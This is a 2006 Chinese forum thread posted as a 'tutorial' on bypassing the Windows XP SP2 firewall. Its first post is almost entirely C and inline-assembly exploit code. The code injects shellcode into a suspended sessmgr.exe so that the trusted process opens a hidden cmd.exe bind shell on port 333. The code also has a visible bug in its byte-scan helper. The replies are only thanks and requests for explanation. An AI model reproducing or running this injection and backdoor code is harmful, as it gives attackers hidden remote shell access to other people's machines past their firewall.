‹‹ 上一主題 | 下一主題 ››
發新話題

[教學]繞過xp sp2防火牆的代碼

蔡逸竹

孤獨者 - 心在黑暗裡旅行 ...... ...

至尊會員

Rank: 7Rank: 7Rank: 7Rank: 7Rank: 7Rank: 7Rank: 7

遊蕩的過客 - 枉入紅塵若許年 .. ...

UID
18273 
帖子
12122 
精華
1273 
積分
240737 
金幣
492641  
威望
5001  
推廣
0  
閱讀權限
99 
來自
尋覓中 
註冊時間
2006-6-24 
最後登錄
2015-5-27 

總版主 典獄長 榮譽勳章 陽光會員 宣傳大使 榮退獎章 糾察隊長 鍾愛一生勳章 大學博士勳章 守護天使勳章 忠誠勳章 高級糾察 社區建設獎章 社區巡守獎章 社界宗師勳章 資源專家勳章 傳學大師勳章 文壇大家勳章 點評專家勳章 終身成就獎章 熱心助人獎章 最佳分享獎章

1樓 發表於 2006-7-15 03:48 

[教學]繞過xp sp2防火牆的代碼

繞過xp sp2防火牆的代碼

Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

[ 本帖最後由 蔡逸竹 於 2006-9-11 18:41 編輯 ]

TOP

owen1980

正式會員

Rank: 2Rank: 2

UID
41699 
帖子
57 
精華
1 
積分
322 
金幣
150  
威望
3  
推廣
0  
閱讀權限
10 
註冊時間
2006-8-9 
最後登錄
2006-12-1 
2樓 發表於 2006-8-9 13:49 
先謝謝大大無私的分享喔!!
讓人期待喔

TOP

wyanne

正式會員

Rank: 2Rank: 2

UID
31039 
帖子
106 
精華
0 
積分
745 
金幣
539  
威望
0  
推廣
0  
閱讀權限
10 
來自
0與1之間 
註冊時間
2006-7-20 
最後登錄
2006-12-23 
3樓 發表於 2006-8-9 15:14 
到底要如何繞過防火牆呀...好想知道唷...

TOP

poach

試用會員

Rank: 1

UID
29334 
帖子
精華
0 
積分
45 
金幣
24  
威望
0  
推廣
0  
閱讀權限
註冊時間
2006-7-17 
最後登錄
2006-9-17 
4樓 發表於 2006-8-10 09:15 
這個好像很有趣
好想知道
謝謝大大的好文章
來去看看有什麼玄機

TOP

erictaiwan

正式會員

Rank: 2Rank: 2

UID
52021 
帖子
23 
精華
0 
積分
78 
金幣
67  
威望
0  
推廣
0  
閱讀權限
10 
註冊時間
2006-8-30 
最後登錄
2021-1-7 
5樓 發表於 2006-8-31 18:38 
take look .and thank you.....

TOP

‹‹ 上一主題 | 下一主題 ››
發新話題

本站所有圖文均屬網友發表,僅代表作者的觀點與本站無關,如有侵權請通知版主會盡快刪除。